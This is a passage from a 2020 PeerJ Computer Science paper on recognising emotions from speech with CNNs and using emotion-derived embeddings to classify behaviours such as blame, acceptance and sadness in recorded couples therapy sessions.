reflects changes of addictive habits. In suicide prevention (Cummins et al., 2015), reasons for living and emotional bond are more relevant. In doctor-patient interactions, empathy or bedside manners are more applicable. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 2/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 In this paper, we will first address the task of basic emotion recognition from speech. Thus we will discuss literature on the notion of emotion (see ‘Emotions’) and prior work on emotion recognition (see ‘Emotion quantification from speech’). We will then, as our first scientific contribution, describe a system that can label emotional speech (see ‘Emotion recognition’). The focus of this paper, however, is to address the more complex task of behavior analysis. Given behavior is very related to the dynamics, perception, and expression of emotions (Schacter, Gilbert & Wegner, 2011), we believe a study is overdue in establishing the degree to which emotions can predict behavior. We will therefore introduce more analytically the notion of behavior (see ‘Behaviour’) and describe prior work in behavior recognition (see ‘Behavior quantification from speech’), mainly from speech signals. The second task of this paper will be in establishing a model that can predict behaviors from basic emotions. We will investigate the emotion-to-behavior aspects in two ways: we will first assume that the discrete emotional labels directly affect behavior (see ‘Context- dependent behavior recognition from emotion labels’). We will further investigate if an embedding from the emotion system, representing behaviors but encompassing a wider range of information, can better encode behaviorally meaningful information (see ‘Context-dependent behavior recognition from emotion-embeddings’). In addition, the notion that behavior is highly dependent on emotional expression also raises the question of how important the sequence of emotional content is in defining behavior. We will investigate this through progressively removing the context from the sequence of emotions in the emotion-to-behavior system (see ‘Reduced context-dependent behavior recognition from emotion-informed embeddings’) and study how this affects the automatic behavior classification performance. BACKGROUND Emotions There is no consensus in the literature on a specific definition of emotion. An ‘‘emotion’’ is often taken for granted in itself and, most often, is defined with reference to a list of descriptors such as anger, disgust, happiness, and sadness etc. (Cabanac, 2002). Oatley & Jenkins (1996) distinguish emotion from mood or preference by the duration of each kind of state. Two emotion representation models are commonly employed in practice (Schuller, 2018). One is based on the discrete emotion theory, where six basic emotions are isolated from each other, and researchers assume that any emotion can be represented as a mixture of the basic emotions (Cowie et al., 2001). The other model defines emotions via continuous values corresponding to different dimensions which assumes emotions change in a continuous manner and have strong internal connections but blurred boundaries between each other. The two most common dimensions are arousal and valence (Schlosberg, 1954). In our work, following related literature, we will refer to basic emotions as emotions that are expressed and perceived through a short observation window. Annotations of such emotions take place without context to ensure that time-scales, back-and-forth interaction dynamics, and domain-specificity is not captured. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 3/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Behavior Behavior is the output of information and signals including but not limited to those: (i) manifested in both overt and covert multimodal cues (‘‘expressions’’); and (ii) processed and used by humans explicitly or implicitly (‘‘experience’’ and ‘‘judgment’’) (Narayanan & Georgiou, 2013; Baumeister et al., 2010). Behaviors encompass significant degrees of emotional perception, facilitation, thinking, understanding and regulation, and are functions of dynamic interactions (Baumeister et al., 2007). Further, such complex behaviors are increasingly domain specific and subjective. Link between emotions and behavior Emotions can change frequently and quickly in a short time period (Ekman, 1992a; Mower & Narayanan, 2011). They are internal states that we perceive or express (e.g., through voice or gesture) but are not interactive and actionable. Behaviors, on the other hand, include highly complex dynamics, information from explicit and implicit aspects, are exhibited over longer time scales, and are highly domain specific. For instance, ‘‘happiness’’, as one of the emotional states, is brought about by generally positive feelings. While within couples therapy domain, behavior ‘‘positivity’’ is defined in (Heavey, Gill & Christensen, 2002; Jones & Christensen, 1998) as ‘‘Overtly expresses warmth, support, acceptance, affection, positive negotiation’’. Those differences apply to both human cognition and machine learning aspects of speech capture, emotion recognition and behavior understanding as shown in Fig. 1 (Soken & Pick, 1999; Hoff, 2009). The increased complexity and contextualization of behavior can be seen both in humans as well as machines. For example, babies start to develop basic emotion perception at the age of seven months (Soken & Pick, 1999). However, it takes emotionally mature and emotionally intelligent humans and often trained domain experts to perceive domain-specific behaviors. In Fig. 1, we illustrate the complexity for machine processing along with the age-of-acquisition for humans. We see a parallel in the increase in demands of identifying behavior in both cases. Motivations and goals of this work The relationship between emotion and behavior is usually implicit and highly nonlinear. Investigating explicit and quantitative associations between behavior and emotions is thus challenging. In this work, based on the deep neural networks’ (DNNs) underlying representative capability (Bengio, Courville & Vincent, 2013; Bengio, 2012), we try to analyze and interpret the relationship between emotion and behavior information through data-driven methods. We investigate the possibility of using transfer learning by employing emotion data as emotional related building blocks, or primitive features, that can describe behavior. Further, we design a deep learning framework that employs a hybrid network structure containing context dependent and reduced contextualization causality models to quantitatively analyze the relationship between basic emotions and complex behaviors. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 4/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Voice Activity Detection Recognize native language Energy-based Activity Detection Detect sounds from womb Isolated Word Recognition First word recognition Large Vocabulary Word Recognition 100 Words recognition 14k Words recognition _ Hoff (2009) Emotion Recognition Basic Emotion Perception _ Soken & Pick (1999) Behavior Recognition Rich Dialog Transcription Human Perception and Cognition Complexity Increasing Machine Learning Task Complexity Increasing Linked to Mental Health and Emotional Intelligence Infants 6 months old Infants5 months old 7 months old 18 months old 6 years old Rich domain-specific behavior recognition Soken & Pick (1999) Emotionally mature adults/experts Figure 1 Illustration of task complexity or age of acquisition for machines and humans. Full-size DOI: 10.7717/peerjcs.246/fig-1 RELATED WORK Researchers are combining machine learning techniques to build reliable and accurate emotion and behavior recognition systems. Speech emotion recognition (SER) systems, of importance in human-computer interactions, enable agents and dialogue systems to act in a more human-like manner as conversational partners (Schuller, 2018). On the other hand, in the domain of behavior signal processing (BSP), efforts have been made in quantitatively understanding and modeling typical, atypical, and distressed human behavior with a specific focus on verbal and non-verbal communicative, affective, and social behaviors (Narayanan & Georgiou, 2013). We will briefly review the related work in the following aspects. Emotion quantification from speech A dominant modality for emotion expression is speech (Cowie & Cornelius, 2003). Significant efforts (El Ayadi, Kamel & Karray, 2011; Beale & Peter, 2008; Schuller et al., 2011) have focused on automatic speech emotion recognition. Traditional emotion recognition systems usually rely on a two-stage approach, in which the feature extraction and classifier training are conducted separately. Recently, deep learning has demonstrated promise in emotion classification tasks (Han, Yu & Tashev, 2014; Le & Provost, 2013). Convolutional neural networks (CNNs) have been shown to be particularly effective in learning affective representations directly from speech spectral features (Mao et al., 2014; Anand & Verma, 2015; Huang & Narayanan, 2017a; Zheng, Yu & Zou, 2015; Aldeneh & Provost, 2017). Mao et al. (2014) proposed to learn CNN filters on spectrally whitened spectrograms by an auto-encoder through unsupervised manners. Aldeneh & Provost (2017) showed that CNNs can be directly applied to temporal low-level acoustic features to identify emotionally salient regions. Anand & Verma (2015) and Huang & Narayanan (2017a) compared multiple kinds of convolutional kernel operations, and showed that the full-spectrum temporal convolution is more favorable for speech emotion recognition tasks. In addition, models with hidden Markov model (HMM) (Schuller, Rigoll & Lang, Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 5/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-1 http://dx.doi.org/10.7717/peerj-cs.246 2003), recurrent neural networks (RNNs) (Wöllmer et al., 2010; Metallinou et al., 2012; Lee & Tashev, 2015) and the hybrid neural network combining CNNs and RNNs (Lim, Jang & Lee, 2016; Huang & Narayanan, 2017b) have also been employed to model emotion affect. Behavior quantification from speech Behavioral signal processing (BSP) (Narayanan & Georgiou, 2013; Georgiou, Black & Narayanan, 2011) can play a central role in informing human assessment and decision making, especially in assisting domain specialists to observe, evaluate and identify domain-specific human behaviors exhibited over longer time scales. For example, in couples therapy (Black et al., 2013; Nasir et al., 2017b), depression (Gupta et al., 2014; Nasir et al., 2016; Stasak et al., 2016; Tanaka, Yamamoto & Haruno, 2017) and suicide risk assessment (Cummins et al., 2015; Venek et al., 2017; Nasir et al., 2018; Nasir et al., 2017a), behavior analysis systems help psychologists observe and evaluate domain-specific behaviors during interactions. Li, Baucom & Georgiou (2016) proposed sparsely connected and disjointly trained deep neural networks to deal with the low-resource data issue in behavior understanding. Unsupervised (Li, Baucom & Georgiou, 2017) and out-of-domain transfer learning (Tseng, Baucom & Georgiou, 2018) have also been employed on behavior understanding tasks. Despite these important and encouraging steps towards behavior quantification, obstacles still remain. Due to the end-to-end nature of recent efforts, low- resource data becomes a dominant limitation (Li, Baucom & Georgiou, 2016; Collobert et al., 2011; Soltau, Liao & Sak, 2017; Heyman et al., 2001). This is exacerbated in BSP scenario by the difficulty of obtaining data due to privacy constraints (Lustgarten, 2015; Narayanan & Georgiou, 2013). Challenges with subjectivity and low interannotator agreement (Busso & Narayanan, 2008; Tseng et al., 2016), especially in micro and macro annotation complicate the learning task. Further, and importantly such end-to-end systems reduce interpretability generalizability and domain transfer (Sculley et al., 2015). Linking emotion and behavior quantification As mentioned before, domain experts employ information within the context of the interaction at varying timescales to estimate the behaviors of interest (Narayanan & Georgiou, 2013; Tseng et al., 2016). Specific short-term affect, e.g., certain basic emotions, can be indicators of some complex long-term behaviors during manual annotation process (Heavey, Gill & Christensen, 2002; Jones & Christensen, 1998; Heyman, 2004). These vary according to the behavior; for example, negativity is often associated with localized cues (Carney, Colvin & Hall, 2007), demand and withdrawal require more context (Heavey, Christensen & Malamuth, 1995), and coercion requires a much longer context beyond a single interaction (Feinberg, Kan & Hetherington, 2007). Chakravarthula et al. (2019) analyzed behaviors, such as ‘‘anger’’ and ‘‘satisfaction’’, and found that negative behaviors could be quantified using short observation length whereas positive and problem solving behaviors required much longer observation. In addition, Baumeister et al. (2007) and Baumeister et al. (2010) discussed two kinds of theories: the direct causality model and inner feedback model. Both models emphasize the existence of a relationship between basic emotion and complex behavior. Literature from psychology (Dunlop, Wakefield & Kashima, 2008; Burum & Goldfried, 2007) and social Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 6/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 science (Spector & Fox, 2002) also showed that emotion can have impacts and further shape certain complex human behaviors. To connect basic emotion with more complex affective states, Carrillo et al. (2016) identified a relationship between emotional intensity and mood through lexical modality. Khorram et al. (2018) verified the significant correlation between predicted emotion and mood state for individuals with bipolar disorder on acoustic modality. All these indicate that the aggregation and link between basic emotions and complex behaviors is of interest and should be examined. PROPOSED WORK: BEHAVIORAL PRIMITIVES Our work consists of three studies for estimation of behavior through emotion information as follows: 1. Context-dependent behavior from emotion labels: Basic emotion affect labels are directly used to predict long-term behavior labels through a recurrent neural network. This model is used to investigate whether the basic emotion states can be sufficient to infer behaviors. 2. Context-dependent behavior from emotion-informed embeddings: Instead of directly using the basic emotion affect labels, we utilize emotion-informed embeddings towards the prediction of behaviors. 3. Reduced context-dependent behavior from emotion-informed embeddings: Similar to (2) above, we employ emotion-informed embeddings. In this case, however, we investigate the importance of context, by progressively reducing the context provided to the neural network in predicting behavior. For all three methods, we utilize a hybrid model of convolution and recurrent neural networks that we will describe in more detail below. Through our work, both emotion labels and emotionally informed embeddings will be regarded as a type of behavior primitive, that we call Basic Affect Behavioral Primitive Information (or Behavioral Primitives for short, BP). An important step in obtaining the above BP is the underlying emotion recognition system. We thus first propose and train a robust Multi-Emotion Regression Network (ER) using convolutional neural network (CNN), which is described in detail in the following subsection. Emotion recognition In order to extract emotionally informed embeddings and labels, we propose a CNN based Multi-Emotion Regression Network (ER). The ER model has a similar architecture as (Aldeneh & Provost, 2017), except that we use one-dimensional (1D) CNN kernels and train the network through a regression task. The CNN kernel filter should include entire spectrum information per scan, and shift along the temporal axis, which performs better than other kernel structures according to Huang & Narayanan (2017a). Our model has three components: (1) stacked 1D convolutional layers; (2) an adaptive max pooling layer; (3) stacked dense layers. The input acoustic features are first processed by multiple stacked 1D convolution layers. Filters with different weights are employed to extract different information from the same input sample. Then, one adaptive max pooling Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 7/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 layer is employed to further propagate 1D CNN outputs with the largest value. This is further processed through dense layers to generate the emotional ratings at short-term segment level. The adaptive max pooling layer over time is one of the key components of this and all following models: first, it can cope with variable length signals and produce fixed size embeddings for subsequent dense layers; Second, it only returns the maximum feature within the sample to ensure only the more relevant emotionally salient information is propagated through training. We train this model as one regression model which predicts the annotation ratings of all emotions jointly. Analogous to the continuous emotion representation model (Schlosberg, 1954), this multi-emotion joint training framework can utilize strong bonds but blurred boundaries within emotions to learn the embeddings. Through this joint training process, the model can integrate the relationship across different emotions, and hopefully obtain an affective-rich embedding. In addition, to evaluate the performance of proposed ER , we also build multiple binary, single-emotion, classification models (Single-Emotion Classification Network (EC)). The EC model is modified based on pre-trained ER by replacing the last linear layer with new fully connected layers to classify each single emotion independently. During training, the back propagation only updates the newly added linear layers without changing the weights of pre-trained ER model. In this case, the loss from different emotions is not entangled and the weights will be optimized towards each emotion separately. More details of experiments and results comparison are described in ‘Experiments and Results Discussion’. As mentioned before, we employ two kinds of behavioral primitives in order to investigate the relationship between emotions and behaviors, and the selection of these two kinds of BP arises through the discrete, EC, and continuous, ER, emotion representation models. The two kinds of BP are: (1) The discrete vector representation of predicted emotion labels, denoted as B-BP_k, from the Single-Emotion Classification Network (EC), where k means kth basic emotion; and (2) The output embeddings of the CNN layers, denoted as E-BP_ l, from the Multi-Emotion Regression Network system (ER), where l represents the output from lth CNN layer. All these are illustrated in Fig. 2. Behavior recognition through emotion-based behavior primitives We now describe three architectures for estimating behavior through Basic Affect Behavioral Primitive Information (or Behavioral Primitives for short, BP). The three methods employ full context of the emotion labels from the Single-Emotion Classification Network (EC), the full context from the embeddings of the Multi-Emotion Regression Network (ER) system, and increasingly reduced context from the Multi-Emotion Regression Network system (ER). Context-dependent behavior recognition from emotion labels In this approach, the binarized predicted labels from the EC system are employed to predict long-term behaviors via sequential models in order to investigate relationships between emotions and behaviors. Such a design can inform the degree to which short-term emotion can influence behaviors. It can also provide some interpretability of the employed Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 8/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 6 Binarized Emotion-Vector Behavior Primitives (B-BP) B-BP_6 Acoustic Features 1D CNN 1D CNN 1D CNN L*84 1D CNN L/2*96 L/4*96 L/8*128 L/16*128 1*128 128 128 6 Emotion ratings Emotion binary label 128 64 2 Input from ER E-BP_1 E-BP_2 E-BP_4 . . . E-BP_3 ER Multi-Emotion Regression Network (ER) Behavior Primitives Single-Emotion Classification Network (EC) FC FC FC FC Fully Connected Layer (FC) 64 FC FC B-BP_2B-BP_1 . . . Max Pooling Emotion Embedding Behavior Primitives (E-BP) 6 Single Emotion Classifiers Figure 2 Models of ER, EC and two kinds of BPs. L is the input feature length. Full-size DOI: 10.7717/peerjcs.246/fig-2 information for decision making, over end-to-end systems that generate predictions directly from the audio features. We utilize the Single-Emotion Classification Network (EC) described in the previous section to obtain the predicted Binarized Emotion-Vector Behavior Primitives (B-BP) on shorter speech segment windows as behavioral primitives. These are extracted from the longer signals that describe the behavioral corpus and are utilized, preserving sequence, hence context, within a recurrent neural network for predicting the behavior labels. Figure 3 illustrates the network architecture and B-BP_* means the concatenation of all B-BP_k, where k ranges from 1 to 6. In short, the B-BP vectors are fed into a stack of gated recurrent units (GRUs), followed by a densely connected layer which maps the last hidden state of the top recurrent layer to behavior label outputs. GRUs were introduced in Chung et al. (2014) as one attempt to alleviate the issue of vanishing gradient in standard vanilla recurrent neural networks and to reduce the number of parameters over long short-term memory (LSTM) neurons. GRUs have a linear shortcut through timesteps which avoids the decay and thus promotes gradient flow. In this model, only the sequential GRU components and subsequent dense layers are trainable, while the EC networks remain fixed. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 9/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-2 http://dx.doi.org/10.7717/peerj-cs.246 Segment Segment Segment Segment… EC EC EC EC GRU GRU GRU GRU Speech Pretrained… … Trainable BehaviorsFC layers B-BP_* B-BP_* B-BP_* B-BP_* Figure 3 B-BP based context-dependent behavior recognition model. Full-size DOI: 10.7717/peerjcs.246/fig-3 … Speech … BehaviorsFC layers Max Pooling E-BP_1 CNN 2 CNN 3 CNN 4 CNN 1 Emotion Regression System (Green box, Figure 2) Frozen Layers E-BP_2 CNN 2 CNN 1 E-BP_4 CNN 2 CNN 1 GRU Segment Embedding E-BP_l Adapted Layers . . . GRU Segment Embedding E-BP_l GRU Segment Embedding E-BP_l CNN 3 CNN 4 CNN 3 CNN 4 Figure 4 E-BP based context-dependent behavior recognition model. E-BP_ l is the output from lth pretrained CNN layer. In practice multiple E-BP_ l can be employed at the same time through concatena- tion. In this work we only employ the output of a single layer at a time. Full-size DOI: 10.7717/peerjcs.246/fig-4 Context-dependent behavior recognition from emotion-embeddings It is widely understood that information closer to the output layer is more tied to the output labels while closer to the input layer information is less constrained and contains more information about the input signals. In our ER network, the closer we are to the output, the more raw information included in the signal is removed and the more we are constrained to the basic emotions. Given that we are not directly interested in the emotion labels, but in employing such relevant information for behavior, it makes sense to employ layers below the last output layer to capture more behavior-relevant information closer to its raw form. Thus, instead of using the binary values representing the absence or existence of the basic emotions, we can instead employ Emotion-Embedding Behavior Primitives (E-EBP) as the input representation. The structure of the system is illustrated in Fig. 4. After pretraining the ER , we keep some layers of that system fixed, and employ their embeddings as the Emotion-Embedding Behavior Primitives. We will discuss the number of fixed layers in the experiments section. This E-BP serves as the input of the subsequent, trainable, convolutional and recurrent networks. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 10/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-3 https://doi.org/10.7717/peerjcs.246/fig-4 http://dx.doi.org/10.7717/peerj-cs.246 S eech a di e e ce C e a a e i hi he l cal i d C e ed ced gl ball E-BP Figure 5 Illustration of local context awareness and global context reduction. In previous sections, the E-BPs (and B-BPs) are passed to a GRU that preserves their sequences. Here they are processed through pooling and context is removed. Full-size DOI: 10.7717/peerjcs.246/fig-5 The overall system is trained to predict the longer-term behavior states. By varying the number of layers that remain unchanged in the ER system and using different embeddings from different layers for the behavior recognition task we can identify the best embeddings under the same overall number of parameters and network architecture. The motivation of the above is that the fixed ER encoding module is focusing on learning emotional affect information, which can be related but not directly linked with behaviors. By not using the final layer, we are employing a more raw form of the emotion-related information, without extreme information reduction, that allows for more flexibility in learning by the subsequent behavior recognition network. This allows for transfer learning (Torrey & Shavlik, 2010) from one domain (emotions) to another related domain (behaviors). Thus, this model investigates the possibility of using transfer learning by employing emotional information as ‘‘building blocks’’ to describe behavior. Reduced context-dependent behavior recognition from emotion-informed embeddings In the above work, we assume that the sequence of the behavior indicators (embeddings or emotions) is important. To verify the need for such an assumption, in this section, we propose varying the degree of employed context. Through quantification, we analyze the time-scales at which the amount of sequential context affects the estimation of the underlying behavioral states. In this proposed model, we design a network that can only preserve local context. The overall order of the embeddings extracted from the different local segments is purposefully ignored so we can better identify the impact of de-contextualizing information as shown in Fig. 5. In practice, this reduced-context model is built upon the existing CNN layers as in the E-BP case. We will create this reduced context system by employing only the E-BP Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 11/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-5 http://dx.doi.org/10.7717/peerj-cs.246 Speech Behaviors Smaller Receptive Field CNN CNN CNNs CNN Pretrained … … FC FC Speech Behaviors Larger Receptive Field CNN CNN CNNs CNN Pretrained … … FC FC Local Avg Pooling Local Avg Pooling E-BP_Optimal Max Pooling Max Pooling E-BP_Optimal A B Figure 6 E-BP reduced context-dependent behavior recognition model. Model (A) has a smaller recep- tive field while model (B) has a larger receptive field because of the added local average pooling layers. Full-size DOI: 10.7717/peerjcs.246/fig-6 embeddings. The E-BP embeddings are extracted from the same emotion system as before. In this case, however, instead of being fed to a recursive layer with full-session view, we eliminate the recursive layer and incorporate a variable number of CNN layers and local average pooling functions in between to adjust context view. Since the final max-pooling layer ignores the order of the input, the largest context is determined by the receptive field view of the last layer before this max-pooling. We can thus investigate the impact of context by varying the length of the CNN receptive field. Figure 6 illustrates the model architecture. We extract the optimal E-BP based on the results of previous model, and then employ more CNN layers with different receptive field sizes to extract high-dimensional representation embeddings, and finally input them to the adaptive max-pooling along the time axis to eliminate the sequential information. Within each CNN receptive field, shown as red triangles in the figure, the model still has access to the full receptive field context. The max pooling layer removes context across the different receptive windows. Furthermore, the receptive field can be large enough to enable the model to capture behavioral information encoded over longer timescales. In contrast a very small receptive area, e.g., at timescale of phoneme or word, sensing behaviors should be extremely difficult (Baumeister et al., 2010) and can even be challenging to detect emotions (Mower & Narayanan, 2011). The size of the receptive field is decided by the number of CNN layers, Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 12/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-6 http://dx.doi.org/10.7717/peerj-cs.246 corresponding stride size, and the number of local average pooling layers in between. In our model, we adjust the size of the receptive field by setting different number of local average pooling layers under which the overall number of network parameters is unchanged. DATASETS Emotion dataset: CMU-MOSEI dataset The CMU Multimodal Opinion Sentiment and Emotion Intensity (CMU-MOSEI) (Zadeh et al., 2018) contains video files carefully chosen from YouTube. Each sample is a monologue with verified quality video and transcript. This database includes 1000 distinct speakers with 1000 kinds of topics, and are gender balanced with an average length of 7.28 seconds. Speech segments are already filtered during the data collection process, thus all speech segments are monologues of verified audio quality. For each speech segment, six emotions (Happiness, Sadness, Anger, Fear, Disgust, Surprise) are annotated on a [0,3] Likert scale for the presence of each emotion. (0: no evidence; 1: weak evidence; 2: evidence; and 3: high evidence of emotion). This, after averaging ratings from 3 annotators, results in a 6-dimensional emotional rating vector per speech segment. CMU-MOSEI ratings can also be binarized for each emotion: if a rating is greater than 0 it is considered that there is some presence of emotion, hence it is given a true presence label, while a zero results in a false presence of the emotion. The original dataset has 23,453 speech segments and each speech segment may contain more than one emotion presence label. Through our experiments, we use the segments with available emotion annotations and standard speaker independent split from dataset SDK (Zadeh, 2019): overall we have true presence in 12,465 segments for happiness, 5,998 for sadness, 4,997 for anger, 2,320 for surprise, 4,097 for disgust and 1,913 for fear. Due to the imbalance, accurate estimation of some emotions will be challenging. The training set consists of 16,331 speech segments, while the validation set and test set consist of 1,871 and 4,662 sentences respectively. Behavior dataset: couples therapy corpus The Couples Therapy dataset is employed to evaluate complex human behaviors. The corpus was collected by researchers from the University of California, Los Angeles and the University of Washington for the Couple Therapy Research Project (Christensen et al., 2004). It includes a longitudinal study of 2 years of 134 real distressed couples. Each couple has been recorded at multiple instances over the 2 years. At the beginning of each session, a relationship-related topic (e.g., ‘‘why can’t you leave my stuff alone?’’) was selected and the couple interacted about this topic for 10 minutes. Each participant’s behaviors were rated by multiple well-trained human annotators based on the Couples Interaction (Heavey, Gill & Christensen, 2002) and Social Support Interaction (Jones & Christensen, 1998) Rating Systems. 31 behavioral codes were rated on a Likert scale of 1 to 9, where 1 refers absence of the given behavior and 9 indicates a strong presence. Most of the sessions have 3 to 4 annotators, and annotator ratings were averaged to obtain the final 33-dimensional behavioral rating vector. The employed part of the dataset includes 569 coded sessions, totaling 95.8 h of data across 117 unique couples. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 13/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 AUDIO PROCESSING AND FEATURE EXTRACTION Behavioral dataset pre-processing For preprocessing the couples therapy corpus we employ the procedure described in (Black et al., 2013). The main steps are Speech Activity Detection (SAD) and diarization. Since we only focus on acoustic features extracted for speech regions, we extract the speech parts using the SAD system described in Ghosh, Tsiartas & Narayanan (2011), and only keep sessions with an average SNR greater than 5 dB (72.9% of original dataset). Since labels of behavior are provided per-speaker, accurate diarization is important in this task. Thus, for diarization we employ the manually-transcribed sessions and a forced aligner in order to achieve high quality interlocutor-to-audio alignment. This is done using the recursive ASR-based procedure of alignment of the transcripts with audio by SailAlign (Katsamanis et al., 2011). Speech segments from each session for the same speaker are then used to analyze behaviors. During testing phase, a leave-test-couples-out process is employed to ensure separation of speaker, dyad, and interaction topics. More details of the preprocessing steps can be found in (Black et al., 2013). After the processing procedure above, the resulting corpus has a total of 48.5 h of audio data across 103 unique couples and a total of 366 sessions. Feature extraction In this work, we focus only on the acoustic features of speech. We utilize Log-Mel filterbank energies (Log-MFBs) and MFCCs as spectrogram features. Further, we employ pitch and energy. These have been shown in past work to be the most important features in emotion and behavior related tasks. These features are extracted using Kaldi (Povey et al., 2011) toolkit with a 25 ms analysis window and a window shift of 10 ms. The number of Mel-frequency filterbanks and MFCCS are both set to 40. For pitch, we use the extraction method in Ghahremani et al. (2014), in which 3 features, normalized cross correlation function (NCCF), pitch (f0), the delta of pitch, are included for each frame. After feature extraction, we obtain an 84-dimensional feature per frame (40 log-MFB’s, 40 MFCC’s, energy, f0, delta of f0, and NCFF). EXPERIMENTS AND RESULTS DISCUSSION General settings For emotion-related tasks, we utilize the CMU-MOSEI dataset with the given standard train, validation, test data split from Zadeh (2019). For the behavior related tasks, we employ the couple therapy corpus and use leave-4- couples-out cross-validation. Note that this results in 26 distinct neural-network training- evaluation cycles for each experiment. During each fold training, we randomly split 10 couples out as a validation dataset to guide the selection of the best trained model and prevent overfitting. All these settings ensure that the behavior model is speaker independent and will not be biased by speaker characteristics or recording and channel conditions. In our experiments, we employ five behavioral codes: Acceptance, Blame, Positivity, Negativity and Sadness, each describing a single interlocutor in each interaction of the Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 14/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 1Full definitions are too long to insert in this manuscript and reader is encouraged to look into (Heavey, Gill & Christensen, 2002; Jones & Christensen, 1998) Table 1 Description of behaviors. Behavior Description Acceptance Indicates understanding, acceptance, respect for partner’s views, feelings and behaviors Blame Blames, accuses, criticizes partner and uses critical sarcasm and character assassinations Positivity Overtly expresses warmth, support, acceptance, affection, positive negotiation Negativity Overtly expresses rejection, defensiveness, blaming, and anger Sadness Cries, sighs, speaks in a soft or low tone, expresses unhappiness and disappointment couples therapy corpus. Table 1 lists a brief description1 of these behaviors from the annotation manuals (Heavey, Gill & Christensen, 2002; Jones & Christensen, 1998). Following the same setting of (Black et al., 2010) to reduce effects of interannotator disagreement, we model the task as a binary classification task of low- and high- presence of each behavior. This also enables balancing for each behavior resulting in equal-sized classes. This is especially useful as some of the classes, e.g., Sadness, have an extremely skewed distribution towards low ratings. More information on the distribution of the data and impact on classification can be found in (Georgiou et al., 2011). Thus, for each behavior code and each gender, we filter out 70 sessions on one extreme of the code (e.g., high blame) and 70 sessions at the other extreme (e.g., low blame). Since due to the data cleaning process, some sessions may be missing some of the behavior codes, we use a mask and train only for the available behaviors. Moreover, the models are trained to predict the binary behavior labels for all behaviors together. The loss is calculated by averaging 5 behavioral classification loss with masked labels. Thus, this loss is not optimizing for any specific behavior but it is focusing on the general, latent, link between emotions and behaviors. ER and EC for emotion recognition Both the Multi-Emotion Regression Network (ER) and the Single-Emotion Classification Network (EC) are trained using the CMU-MOSEI dataset. The Multi-Emotion Regression Network (ER) system consists of 4 layers of 1D CNN layers, adaptive max-pooling layer and followed by 3 fully connected layers with ReLU activation function. During the training, we randomly choose a segment from each utterance and represent the label of the segment using the utterance label. In our work, we employ a segment length of 1 s. The model is trained jointly with all six emotions by optimizing the mean square error (MSE) regression loss for all emotions ratings together using Adam optimizer (Kingma & Ba, 2014). In a stand-alone emotion regression task, a separate network that can optimize per- emotion may be needed (through higher-level disconnected network branches), however in our work, as hypothesized above, this is not necessary. Our goal is to extract as much Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 15/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Table 2 Weighted classification accuracy (WA) in percentage for emotion recognition on the CMU- MOSEI dataset. Bold numbers represent the best performing system. Emotions Anger Disgust Fear Happy Sad Surprise Methods in CMU-MOSEI Zadeh et al. (2018) 56.4 60.9 62.7 61.5 62.0 54.3 Proposed EC 61.2 64.9 57.0 63.1 62.5 56.2 information as possible from the signal relating to any and all available emotions. We will, however, investigate optimizing per emotion in the EC case. Further to the ER system, we can optimize per emotion through the Single-Emotion Classification Network (EC). This is trained for each emotion separately by replacing the pre-trained ER ’s last linear layer with three emotion-specific fully connected layers. We use the same binary labeling setting as described in Zadeh et al. (2018): within each emotion, for samples with original rating value larger than zero, we assign the label 1 by considering the presence of that emotion; for samples with rating 0, we assign label 0. During training, we randomly choose 1-second segments as before. During evaluation, we segment each utterance into one-second segments and the final utterance emotion label is obtained via majority voting. In addition, the CMU-MOSEI dataset has a significant data imbalance issue: the true label in each emotion is highly under-represented. To alleviate this, during training, we balance the two classes by subsampling the 0 label esence class in every batch. In our experiments, in order to correctly classify most of the relevant samples, the model is optimized and selected based on average weighted accuracy (WA) as used in Zadeh et al. (2018). WA is defined in Tong et al. (2017): Weighted Accuracy = (TP×N /P+TN)/2N , where TP (resp. TN) is true positive (resp. true negative) predictions, and P (resp. N) is the total number of positive (resp. negative) examples. As shown in Table 2, we present WA of each EC system and compare them with the state-of-art results from Zadeh et al. (2018). Compared with Zadeh et al. (2018), our proposed 1D CNN based emotion recognition system achieves comparable results and thus the predicted binary emotion labels can be considered satisfactory for further experiments. More importantly, our results indicate that the pre-trained ER embedding captures sufficient emotion related information and can thus be employed as a behavior primitive. Context-dependent behavior recognition The main purpose of the experiments in this subsection is to verify the relationship between emotion-related primitives and behavioral constructs. We employ both B-BP and E-BP as described below. Before that, we first use examples to illustrate the importance of context information in behavior understanding. Importance of context information in behavior understanding Prior to presenting the behavior classification results, we use two sessions from couple therapy corpus to illustrate the importance of context information in behavior understanding. Once the Single-Emotion Classification Network (EC) systems are trained, a sequence of emotion label vectors can be generated by applying the EC systems on each Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 16/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Anger Disgust Fear Happy Sad Surprise Emotion 0 0.1 